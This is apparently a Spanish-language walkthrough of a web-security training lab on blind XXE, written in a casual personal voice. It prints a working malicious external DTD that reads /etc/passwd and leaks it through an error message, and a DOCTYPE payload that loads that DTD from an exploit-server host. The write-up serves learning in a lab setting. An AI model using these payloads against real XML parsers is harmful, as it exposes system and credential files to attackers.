👾Laboratorio: Exploiting blind XXE to retrieve data via error messages

Como muy bien dice el lab debo usar un external DTD, que en este caso seguramente será con el exploit server, allá alojaré mis entidades de parametros con el archivo inexistente y el file que apunta a /etc/passwd y listo con base en ello iré terminando de construir mi ataque.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % test "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%test;
%error;

<!DOCTYPE foo [<!ENTITY % testingFelipe SYSTEM
"http://exploit-0af800d40385b9d98024207b0107003d.exploit-server.net/testing.dtd"> %testingFelipe;]>

El servidor de exploit debo actualizar el endpoint para que esté apuntando correctamente a un testing.dtd que es el documento DTD primero de arriba.

Y almacenamos el DTD →

Tomó la petición POST y le añado la invocación del DTD Doctype donde llamamos a el servidor exploit que tiene el DTD con las entidades de parametros y la declaración dinamica que es la que llama a la entidad parametro dentro de una entidad parametro.

Y así fue como lo resolví JUePUTA VIDA MUY CHIMBA Oís:

PreviousLaboratorio: Exploiting blind XXE to exfiltrate data using a malicious external DTD NextLaboratorio: Exploiting XXE to retrieve data by repurposing a local DTD

Last updated 10 months ago